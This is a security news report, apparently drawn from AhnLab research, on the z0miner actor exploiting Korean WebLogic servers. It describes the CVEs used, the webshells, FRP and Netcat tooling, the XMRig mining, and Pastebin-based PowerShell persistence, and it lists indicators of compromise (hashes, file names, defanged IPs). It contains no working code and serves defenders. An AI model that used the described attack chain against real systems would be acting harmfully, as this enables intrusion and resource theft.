Web Server Compromised by Hackers for z0Miner Malware Deployment

Web Server Compromised by Hackers for z0Miner Malware Deployment

The malicious actor, known as “z0miner,” has been discovered targeting Korean WebLogic servers to disseminate various forms of malware, including miners, network utilities, and scripts for launching additional attacks. This threat actor has a track record of exploiting vulnerable servers, including those running Atlassian Confluence, Apache ActiveMQ, Log4j, and numerous others.

Initially identified by researchers at Tencent in 2020, the threat actor dubbed “z0miner” gained notoriety for exploiting vulnerabilities such as CVE-2020-14882 and CVE-2020-14883 on Oracle WebLogic servers.

Recently, ASEC researchers have observed a shift in their tactics towards targeting Korean WebLogic servers. During their investigation, they uncovered various tools including FRP (Fast Reverse Proxy), NetCat, and AnyDesk being utilized by the threat actor.

z0Miner Malware Deployment

As reported by Cyber Security News, the threat actor targeted these Korean WebLogic servers exploiting vulnerabilities stemming from inadequate security configurations and the extensive exposure of server information.

The threat actor was able to ascertain the Tomcat version and server version of these servers. Subsequently, armed with this information, they employed various tools such as WebShell, FRP, and NetCat to escalate their exploitation.

source : AhnLab

Exploitation Methods


The threat actor exploited the WebLogic vulnerability CVE-2020-14882 to implant a JSP webshell onto the vulnerable system, facilitating persistence and granting control over the system.

Three distinct webshells, including JSP File Browser, Shack2, and Behinder, were deployed. Remarkably, none of these webshells were identified by anti-malware products.

Fast Reverse Proxy (FRP)

This tool facilitated Remote Desktop Protocol (RDP) communication. Both the default frpc and a customized version were employed. The default frpc operates by loading a settings file in *.INI format and initiating the connection, whereas the customized frpc can be executed without relying on a separate file.


Netcat enables reading and writing data over network connections and is commonly found in numerous webshells. These tools offer a remote shell feature, enabling them to circumvent firewalls and gain control over the targeted system.

Miner (XMRig)

z0miner employs different versions of XMRig for Windows and Linux operating systems. Specifically, XMRig 6.18.0 was utilized for Windows, while 6.18.1 was deployed for Linux.

To ensure persistence with the Miner, the threat actor utilized Task Scheduler (schtasks) or WMI’s event filter. They configured it to retrieve a PowerShell script from a designated Pastebin address and execute it accordingly.The threat actor utilized the Monero Wallet and Mining Pool address. Additionally, AnyDesk was employed as a tool within the webshell, primarily activated when exploiting the Apache ActiveMQ vulnerability (CVE-2023-46604).

Indicators Of Compromise-z0Miner

File Detection

  • HackTool/Win.Netcat (2022.10.18.03)
  • Win-Trojan/Miner3.Exp (2022.06.24.02)
  • Downloader/Shell.Miner.SC197168 (2024.02.27.01)
  • Data/JSON.Miner (2024.02.27.01)
  • Data/JSON.Miner (2024.02.27.01)
  • Trojan/PowerShell.Miner (2024.02.27.01)
  • Trojan/Script.z0Miner.SC197169 (2024.02.27.01)
  • Trojan/Win.FRP (2024.02.27.01)
  • Trojan/Shell.Miner.SC197170 (2024.02.27.01)
  • Trojan/Shell.Miner.SC197171 (2024.02.27.01)
  • Trojan/Shell.Agent.SC197172 (2024.02.27.01)
  • Downloader/Shell.Miner.SC197173 (2024.02.27.01)
  • WebShell/JSP.Generic.S1866 (2024.02.27.00)
  • Linux/CoinMiner.Gen2 (2022.11.24.02)
  • WebShell/JSP.FileBrowser.SC197174 (2024.02.27.01)
  • WebShell/JSP.Generic.S1957 (2024.02.27.00)
  • Trojan/Shell.Agent.SC197175 (2024.02.27.03)
  • Downloader/PowerShell.Miner (2024.02.27.03)
  • CoinMiner/Shell.Generic.S2078 (2024.02.27.00)
  • Downloader/PowerShell.Miner.SC197176 (2024.02.27.01)


  • 523613a7b9dfa398cbd5ebd2dd0f4f38 : userinit.exe(Netcat)
  • 2a0d26b8b02bb2d17994d2a9a38d61db : x.rar(XMRig, exe)
  • 4cd78b6cc1e3d3dde3e47852056f78ad : al.txt
  • 085c68576c60ca0361b9778268b0b3b9 : (config.json)
  • b6aaced82b7c663a5922ce298831885a : (config.json)
  • 7b2793902d106ba11d3369dff5799aa5 : cpu.ps1
  • ad33f965d406c8f328bd71aff654ec4c : frpc.ini
  • 7e5cc9d086c93fa1af1d3453b3c6946e : svcho.exe(frpc)
  • e60d8a3f2190d78e94c7b952b72916ac : frp5.exe
  • 8434de0c058abb27c928a10b3ab79ff8 : l.txt
  • 90b74cdc4b7763c6b25fdcd27f26377f : l.txt
  • 83e163afd5993320882452453c214932 : lcpu.txt
  • a0766ad196626f28919c904d2ced6c85 : ll.txt
  • 903fce58cb4bfc39786c77fe0b5d9486 : pan.rar(Shack2 WebShell)
  • c2fb307aee872df475a7345d641d72da : s.rar(XMRig, ELF)
  • 88d49dad824344b8d6103c96b4f81d19 : session.rar(Zubin WebShell)
  • efc2a705c858ed08a76d20a8f5a11b1b : shell.rar(Behinder WebShell)
  • 98e167e7c2999cbea30cc9342e944a4c : solr.sh
  • 575575f5b6f9c4f7149ed6d86fb16c0f : st.ps1
  • 547c02a9b01194a0fcbfef79aaa52e38 : st2.txt
  • fd0fe2a3d154c412be6932e75a9a5ca1 : stt.txt


(Korean web servers exploited and used as download servers are shown only on TIP.)

  • 107.180.100[.]247:88
  • 15.235.22[.]212:5690
  • 15.235.22[.]213:59240

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!